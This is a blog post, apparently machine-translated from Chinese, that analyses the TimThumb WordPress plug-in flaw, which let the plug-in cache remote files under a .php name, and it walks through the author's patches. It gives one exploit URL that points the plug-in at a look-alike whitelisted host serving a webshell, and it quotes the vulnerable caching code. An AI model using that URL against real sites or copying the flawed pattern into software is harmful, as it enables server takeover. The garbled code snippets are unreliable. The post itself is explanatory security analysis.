Key points and interesting points of WordPress TimThumb plug-in Vulnerability

A few days ago, a WordPress TimThumb plug-in was exposed outside China. Many WordPress Themes have been used for this plug-in, including some paid themes in China. I will not talk about it here, so as to avoid the hacker from posting blogs.

Http://code.google.com/p/timthumb/source/browse/trunk/timthumb.php? Spec = svn140 & r = 140

The main function of this plug-in is to cache remote images to a local device. one of the branches of the cached images has a vulnerability, which allows you to directly download and save images through CURL. Let's first look at the vulnerability context from the source code. To go to the branch of the vulnerability cache image, the image URL must contain the following domain names.

$ AllowedSites = array (
'Flickr. com ',
'Picasa. com ',
'Blogger. com ',
'Wordpress. com ',
'Img .youtube.com ',
'Upload .wikimedia.org ',
'Photobucket. com ',
);

 

The key to the vulnerability is the saved file name.

$ File_details = pathinfo ($ src );
$ Filename = 'external _ '. md5 ($ src );
$ Local_filepath = DIRECTORY_CACHE. '/'. $ filename. '.'. $ file_details ['extension'];
// $ Local_filepath is 'external _ md5 ($ src) plus $ file_details ['extension'];

If $ src is a http://www.bkjia.com/x. php, The pathinfo function takes the variable's. php suffix directly after processing $ src.

The cached file name will be external_md5 ($ src). php

 

Finally, hackers can use timthumb. php? Src = http://wordpress.com.hacker.com/webshell.php.

 

The following describes how to fix the vulnerability. google code diff is more intuitive:

1. http://code.google.com/p/timthumb/source/diff? Spec = maid & r = 141 & format = side & path =/trunk/timthumb. php

OK. The author found that an image with the PHP suffix is saved.

$ File_infos = getimagesize ($ local_filepath); // use the getimagesize function to check whether the file format is an image.

If (empty ($ file_infos ['mime ']) |! Preg_match ("/jpg | jpeg | gif | png/I", $ mime_type ))

// Use the image suffix to check the regular match $ mime_type. You can see the above information for the contact program.

$ Mime_type = mime_type ($ src );

The mime_type function does not look at it anymore. The suffix is determined by the file format. If this condition is not met, the file will be deleted.

We can see that it is basically useless here. The PHP code can be hidden in the image file after binary merge, so the author has made a second upgrade.

 

2. http://code.google.com/p/timthumb/source/diff? Spec = maid & r = 142 & format = side & path =/trunk/timthumb. php

$ Filename = 'external _ '. md5 ($ src );
$ Local_filepath = DIRECTORY_CACHE. '/'. $ filename;

// The author finally finds the root cause of the vulnerability and changes the file name to external _ '. md5 ($ src );

 

3. http://code.google.com/p/timthumb/source/diff? Spec = maid & r = 143 & format = side & path =/trunk/timthumb. php

But is it all done here? The nginx cgi_script_name vulnerability discovered by 80sec, so the author began to consider the security of the cached image source.

$ Url_info ['host'] is obtained through the parse_url function.

If (strpos (strtolower ($ url_info ['host']. '/'), $ site )! = False)

// The author starts to strictly match the whitelist URL and searches for the URL Based on the HOST and path character, instead of a simple string search.

 

4. http://code.google.com/p/timthumb/source/diff? Spec = maid & r = 144 & format = side & path =/trunk/timthumb. php

The author uses a more elegant method to match the HOST of the URL

If (preg_match ('/(? : ^ | \.) '. $ Site.' $/I ', $ url_info ['host'])

 

5. http://code.google.com/p/timthumb/source/diff? Spec = svn145 & r = 145 & format = side & path =/trunk/timthumb. php

The authors found that the images from the blogger.com, wordpress.com, and photobucket.com whitelists are unreliable, so they removed the three whitelists.

 

6. http://code.google.com/p/timthumb/source/diff? Spec = maid & r = 148 & format = side & path =/trunk/timthumb. php

Finally, there is an episode.

Touch (DIRECTORY_CACHE. '/index. php ');

The author feared that the server would cache the image directory to the column directory. Later, the hacker picked up the webshell left by the hacker and added index. php.

 

PS: Finally, let's sigh again. Security is just like this. You say the programmer is bitter.

This article is from: xuexiao blog